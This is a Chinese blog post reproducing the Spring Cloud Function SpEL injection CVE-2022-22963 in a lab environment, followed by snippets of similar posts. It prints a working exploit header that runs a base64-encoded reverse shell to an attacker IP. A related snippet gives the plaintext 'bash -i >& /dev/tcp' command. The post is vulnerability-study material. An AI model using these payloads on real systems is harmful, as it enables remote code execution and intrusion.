Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现

于 2023-11-29 16:46:09 发布
阅读量238 收藏
点赞数
分类专栏: 网络安全 web安全 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/XXokok/article/details/134693929
版权
本文介绍了SpringCloudFunction中的一个安全漏洞,即RoutingFunction类的apply方法因处理请求头中的恶意SpEL表达式可能导致远程代码执行。攻击者可通过构造特定请求触发该漏洞,从而执行任意命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现

名称: Spring Cloud Function SPEL 远程代码执行

描述: Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。

靶场打开以后,访问这个地址,抓取这个地址的数据包

/functionRouter

image

把数据包的请求模式改成POST,注意:POST不能直接切换要右键通过选项来切换

在请求头中添加如下字段,其中这段base64的值是反弹shell的命令,要自己替换成自己的。

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkxLjEzOC85MDA0IDA+JjE=}|{base64,-d}|{bash,-i}")

image

image

攻击机上监听指定端口 :

image

点击发送数据包后,即可在这边接收到来自目标的shell

1701247456885

image

Spring Cloud Function SpEL表达式注入(CVE-2022-22963)
李火火的安全圈
04-02 1390
文章目录声明前言一、漏洞概述二、影响版本三、本地复现四、漏洞原理五、官方修复文档 声明 本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记! 前言 在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。 一、漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 funct
Spring Cloud Function SpEL表达式命令注入CVE-2022-22963漏洞复现
最新发布
weixin_54786196的博客
10-27 486
Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3940
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
CVE-2022-22963Spring Cloud Function SpEL 远程代码执行漏洞
冬的博客
04-11 4221
读者需知 本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 简介 SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手 最近Spring Cloud Function组件爆出0day .
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3257
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析(CVE-2022-22963SpringCloud FunctionSpring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
漏洞复现Spring Cloud Function SPEL表达式注入漏洞cve-2022-22963
Hi~ 土拨鼠
04-01 1653
文章目录1、复现环境2、构造POC3、在vps上开启监听4、执行POC,成功反弹shell 1、复现环境 本文是在vulfocus在线环境进行的复现:http://vulfocus.io/ 2、构造POC 由描述可知需要构造请求包,添加spring.cloud.function.routing-expression参数,内容会被作为spel表达式解析 由于java中不支持管道符和特殊符号,所以将反弹shell的命令用base64进行编码处理 spring.cloud.function.routing-ex
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 3356
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
Spring Cloud Function现RCE 0-day漏洞
HongYu012的博客
03-27 8380
近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL 表达式注入漏洞,可利用该漏洞通过注入 SPEL 表达式来触发远程命令执行。 Spring Cloud Function 是一个基于 Spring Boot 的函数计算框架。通过抽象传输细节和基础设施,为开发者保留熟悉的开发工具和开发流程,让开发者专注于实现业务逻辑,从而提高开发效率。 Spring Cloud Function 是一个具有以下高级目标的项目: 通过函数促进业务逻辑
Spring Cloud Function SPEL 远程代码执行
Cobra的博客
04-24 2491
前言 最近Spring Cloud Function组件爆出0day -- SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。 影响版本 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 漏洞复现 环境来自vulfocus靶场 1、开启环境 2、利用burp抓包,需要给他一个路径 3、在vps开启监听 4、修改数据包,将反弹shell进行base64编码,并添加一个Content-Type .
vulfocus复现Spring Cloud Function SPEL 远程代码执行
woai_zhongguo的博客
07-18 1498
Vulfocus复现Spring Cloud Function SPEL 远程代码执行
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现
热爱学习,喜欢折腾!
08-28 5631
SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。............
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
HEAVEN569的博客
06-21 1720
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
Spring Cloud Function Spel表达式注入
编程不良人
08-24 1122
Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),支持基于SpEL的函数式动态路由。在特定配置下,3
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 5598
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
Spring Cloud FunctionSPEL 表达式漏洞SPEL 表达式是个啥?
强哥叨逼叨
03-30 910
点击关注强哥,查看更多精彩文章呀 哈喽,大家好,我是强哥。 Spring Cloud FunctionSPEL漏洞 近日,Spring Cloud Function 官方测试用例曝光了 Spring Cloud Function SPEL 表达式注入漏洞,可利用该漏洞通过注入SPEL 表达式来触发远程命令执行。 “由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expre
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值